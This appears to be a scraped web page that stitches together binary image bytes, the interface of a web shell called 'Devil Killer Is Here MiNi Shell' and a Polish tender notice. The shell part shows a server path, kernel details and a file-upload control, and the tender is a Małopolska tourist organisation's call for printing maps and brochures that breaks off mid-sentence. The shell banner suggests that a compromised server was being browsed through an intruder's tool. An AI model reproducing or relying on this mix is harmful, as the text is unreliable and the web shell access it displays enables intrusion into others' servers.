JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250505/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250505/0021629101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Druk i dostawa map i wydawnictw promocyjno-informacyjnych MSIT, dla potrzeb Projektu pn.: „Wsparcie funkcjonowania i rozwój Małopolskiego Sytemu Informacji turystycznej 2025 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MAŁOPOLSKA ORGANIZACJA TURYSTYCZNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 356372852</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Kleparski 4 lokal 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-150</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@mot.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mot.krakow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zamawiający zobowiązany do stosowania ustawy PZP na mocy umowy z Województwem Małopolskim </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność na rzecz promocji i kreowania pozytywnego wizerunku Województwa Małopolskiego oraz wspierania rozwoju turystyki </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Druk i dostawa map i wydawnictw promocyjno-informacyjnych MSIT, dla potrzeb Projektu pn.: „Wsparcie funkcjonowania i rozwój Małopolskiego Sytemu Informacji turystycznej 2025 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e089f63c-43f4-4e2f-b618-37b37cc6c698</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00216291</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mot.krakow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.mot.krakow.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1.	Ofertę należy złożyć za pośrednictwem przesyłki pocztowej/kurierskiej na adres Małopolskiej Organizacji Turystycznej w Krakowie, Rynek Kleparski 4, lokal 13, 31-150 Kraków, sekretariat, w nieprzekraczalnym terminie do dnia 13.05.2025 do godz. 10:00, co oznacza, że z upływem powyższego terminu oferta powinna fizycznie znaleźć się u Zamawiającego. Decydujące znaczenie dla oceny zachowania powyższego terminu ma data i godzina wpływu oferty do Zamawiającego, a nie data jej wysłania przesyłką pocztową czy kurierską. Oferty nadesłane pocztą będą zakwalifikowane do postępowania przetargowego, pod warunkiem ich dostarczenia przez pocztę w nieprzekraczalnym terminie wskazanym powyżej. Oferty można składać również osobiście w siedzibie Zamawiającego w Krakowie, ul. Rynek Kleparski 4/13, w dni robocze od poniedziałku do piątku w godz. 8.00-16.00.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych Wykonawcy („ADO”) jest Zamawiający.<br/>2. W sprawie ochrony danych osobowych można skontaktować się z Inspektorem Ochrony<br/>Danych powołanym pod adresem e-mail: iodo@mot.krakow.pl lub pod adresem siedziby<br/>Zamawiającego.<br/>3. Cele i podstawy przetwarzania. Dane osobowe Wykonawcy będą przetwarzane na podstawie<br/>art. 6 ust. 1 lit. b) RODO – przetwarzanie danych jest niezbędne do zawarcia umowy lub<br/>podjęcia działań przed zawarciem umowy, a także na podstawie art. 6 ust. 1 lit. f) RODO –<br/>uzasadnione interesy Administratora, w szczególności dochodzenie roszczeń.<br/>4. Okres przetwarzania danych osobowych Wykonawcy związany jest ze wskazanymi powyżej<br/>celami ich przetwarzania. Wobec powyższego dane osobowe będą przetwarzane przez czas,<br/>w którym przepisy prawa nakazują Administratorowi przechowywanie danych lub przez okres<br/>przedawnienia ewentualnych roszczeń, do dochodzenia których konieczne jest dysponowanie<br/>danymi.<br/>5. Prawa osoby, której dane dotyczą. W przypadkach i na zasadach określonych w powszechnie<br/>obowiązujących przepisach o ochronie danych osobowych przysługują Wykonawcy prawa do<br/>dostępu do swoich danych oraz otrzymania ich kopii, do sprostowania (poprawiania) danych,<br/>do usunięcia, ograniczenia ich przetwarzania lub wniesienia sprzeciwu wobec ich<br/>przetwarzania, do przenoszenia danych oraz wniesienia skargi do właściwego organu<br/>nadzorczego.<br/>6. Odbiorcy danych. Dane osobowe Wykonawcy będą przekazywane uprawnionym instytucjom<br/>określonym przez przepisy prawa oraz podmiotom przetwarzającym, które świadczą usługi na<br/>rzecz Administratora danych i którym te dane są powierzane. Dane osobowe Wykonawcy nie<br/>będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>7. Podanie danych jest dobrowolne, jednakże ich brak uniemożliwi udział w postępowaniu oraz<br/>prawidłowe zawarcie i wykonanie Umowy.<br/>8. Zautomatyzowane podejmowanie decyzji. Informujemy, że w ramach przetwarzania danych,<br/>o których mowa powyżej nie będą podejmowane decyzje w sposób zautomatyzowany i dane<br/>Wykonawcy nie będą profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WYD/MSIT/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług drukowania i dostawy wydawnictw promocyjno-informacyjnych MSIT, w łącznym nakładzie 35 864 egzemplarzy dla potrzeb Projektu pn.: „Wsparcie funkcjonowania i rozwój Małopolskiego Sytemu Informacji turystycznej 2025 r.” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-07-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">3.	Zamawiający przewiduje możliwość udzielenia wykonawcy usług zamówienia polegającego na powtórzeniu podobnych usług, pod warunkiem zgodności zamówienia podobnego z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które:<br/>1) zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania;<br/>2) nie zostaną odrzucone przez Zamawiającego.<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria:<br/>18.1.2.1. „Cena” – 90 %.<br/>18.1.2.2. „Jakość” – 10 %.<br/>Porównywaną ceną będzie cena brutto.<br/>3. Maksymalna liczba punktów w kryterium równa jest określonej wadze w kryterium w %. Ocena łączna stanowi sumę punktów<br/>uzyskanych w ramach ww. kryteriów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, a przyznawanie<br/>ilości punktów poszczególnym ofertom w każdej części zamówienia odbywać się będzie wedle następujących zasad:<br/>18.1.3.1. „Cena” (C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku. Maksymalna ilość punktów – 90. Oferta o<br/>najniższej cenie otrzyma największą ilość punktów, pozostałe proporcjonalnie mniej. Ilość punktów Zamawiający obliczy wedle<br/>działania:<br/>Pi (C) = • Max (C)<br/>gdzie:<br/>Pi(C) ilość punktów, jakie otrzyma oferta „i&#34; za kryterium „Cena&#34;;<br/>Cmin najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert;<br/>Ci cena badanej oferty „i&#34;;<br/>Max (C) maksymalna ilość punktów wynosi 90<br/>18.1.3.2. „Jakość“– ocenie poddana zostanie jakość dołączonych do ofert próbek. Maksymalna ilość punktów – 10. Oceny próbek<br/>dokonają członkowie komisji przetargowej. Punktacja zostanie podzielona średnią arytmetyczną punktów przyznanych przez<br/>wszystkich członków komisji w ramach poszczególnych podkryteriów, wedle następujących zasad:<br/>• nasycenie barw i precyzja szczegółów (Jb) – 5 % (maks. 5 pkt),<br/>• strona techniczna wydawnictw/map (Jt) – 5 % (maks. 5 pkt).<br/>• przyznana punktacja wg. Kryterium „Jakość“ zostanie obliczona wedle wzoru:<br/>J = średnia arytmetyczna (Jb) + średnia arytmetyczna (Jt)<br/>4. Na najkorzystniejszą ofertę w każdej części zamówienia zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyskała<br/>najwyższą ilość punktów, będących sumą punktów cząstkowych za poszczególne kryteria, wyliczoną wedle wzoru:<br/>P = C + J<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taką samą punktację,<br/>zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty<br/>otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można<br/>dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>6. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w dokumentach zamówienia. Jeżeli termin<br/>związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała<br/>najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty. W przypadku<br/>braku zgody, o której mowa wyżej, zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta<br/>została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>8. Zamawiający unieważni postępowanie o udzielenie zamówienia w przypadku, gdy Wykonawcy złożą oferty dodatkowe o takiej<br/>samej cenie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług drukowania i dostawy map w łącznym nakładzie 13 000 egzemplarzy dla potrzeb Projektu pn.: „Wsparcie funkcjonowania i rozwój Małopolskiego Sytemu Informacji turystycznej 2025 r.” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-07-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">3.	Zamawiający przewiduje możliwość udzielenia wykonawcy usług zamówienia polegającego na powtórzeniu podobnych usług, pod warunkiem zgodności zamówienia podobnego z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które:<br/>1) zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania;<br/>2) nie zostaną odrzucone przez Zamawiającego.<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria:<br/>18.1.2.1. „Cena” – 90 %.<br/>18.1.2.2. „Jakość” – 10 %.<br/>Porównywaną ceną będzie cena brutto.<br/>3. Maksymalna liczba punktów w kryterium równa jest określonej wadze w kryterium w %. Ocena łączna stanowi sumę punktów<br/>uzyskanych w ramach ww. kryteriów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, a przyznawanie<br/>ilości punktów poszczególnym ofertom w każdej części zamówienia odbywać się będzie wedle następujących zasad:<br/>18.1.3.1. „Cena” (C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku. Maksymalna ilość punktów – 90. Oferta o<br/>najniższej cenie otrzyma największą ilość punktów, pozostałe proporcjonalnie mniej. Ilość punktów Zamawiający obliczy wedle<br/>działania:<br/>Pi (C) = • Max (C)<br/>gdzie:<br/>Pi(C) ilość punktów, jakie otrzyma oferta „i&#34; za kryterium „Cena&#34;;<br/>Cmin najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert;<br/>Ci cena badanej oferty „i&#34;;<br/>Max (C) maksymalna ilość punktów wynosi 90<br/>18.1.3.2. „Jakość“– ocenie poddana zostanie jakość dołączonych do ofert próbek. Maksymalna ilość punktów – 10. Oceny próbek<br/>dokonają członkowie komisji przetargowej. Punktacja zostanie podzielona średnią arytmetyczną punktów przyznanych przez<br/>wszystkich członków komisji w ramach poszczególnych podkryteriów, wedle następujących zasad:<br/>• nasycenie barw i precyzja szczegółów (Jb) – 5 % (maks. 5 pkt),<br/>• strona techniczna wydawnictw/map (Jt) – 5 % (maks. 5 pkt).<br/>• przyznana punktacja wg. Kryterium „Jakość“ zostanie obliczona wedle wzoru:<br/>J = średnia arytmetyczna (Jb) + średnia arytmetyczna (Jt)<br/>4. Na najkorzystniejszą ofertę w każdej części zamówienia zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyskała<br/>najwyższą ilość punktów, będących sumą punktów cząstkowych za poszczególne kryteria, wyliczoną wedle wzoru:<br/>P = C + J<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taką samą punktację,<br/>zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty<br/>otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można<br/>dokonać wyboru oferty w sposób, o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>6. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w dokumentach zamówienia. Jeżeli termin<br/>związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała<br/>najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty. W przypadku<br/>braku zgody, o której mowa wyżej, zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta<br/>została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.<br/>7. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>8. Zamawiający unieważni postępowanie o udzielenie zamówienia w przypadku, gdy Wykonawcy złożą oferty dodatkowe o takiej<br/>samej cenie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca musi spełniać warunek posiadania doświadczenia w wykonaniu lub wykonywaniu usług odpowiadających<br/>swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – tj. wykonał w tym okresie lub<br/>wykonuje:<br/>1) dla części I zamówienia - co najmniej dwie usługi drukowania, o łącznej wartości tych usług co najmniej 300 000,00 zł netto. <br/>2) dla części II zamówienia - co najmniej jedną usługę drukowania map składanych, o wartości tej usługi co najmniej 20 000,00 zł netto.<br/><br/>Ocena spełniania warunku zostanie dokonana wg formuły: „spełnia – nie spełnia”, na podstawie złożonego przez Wykonawcę:<br/>- oświadczenia o spełnianiu warunków udziału w postępowaniu,<br/>- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych* usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>- dowodów**, określających, czy usługi te zostały wykonane lub są 